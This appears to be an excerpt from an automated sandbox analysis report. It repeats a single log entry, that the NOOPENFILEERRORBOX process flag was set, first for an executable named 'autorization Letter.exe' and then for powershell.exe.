                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
